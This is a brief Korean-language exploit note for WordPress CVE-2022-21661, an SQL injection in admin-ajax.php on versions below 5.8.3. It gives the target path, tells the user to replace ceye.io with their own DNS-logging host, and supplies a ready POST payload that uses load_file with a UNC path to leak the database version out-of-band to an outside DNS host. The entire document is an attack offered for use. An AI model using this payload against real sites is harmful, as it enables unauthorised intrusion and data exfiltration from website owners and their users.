
WordPress CVE-2022-21661 SQL 인젝션 취약점 (admin-ajax.php) 익스플로잇. 5.8.3 미만 버전에서 DNS를 통한 대역 외 데이터 유출 방식 사용.
#version<5.8.3
경로:http://your target/wp-admin/admin-ajax.php
주입 유형은 out-of-band이며, dnslog를 직접 지정하고 ceye.io를 대체해야 합니다.
POST- 데이터:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}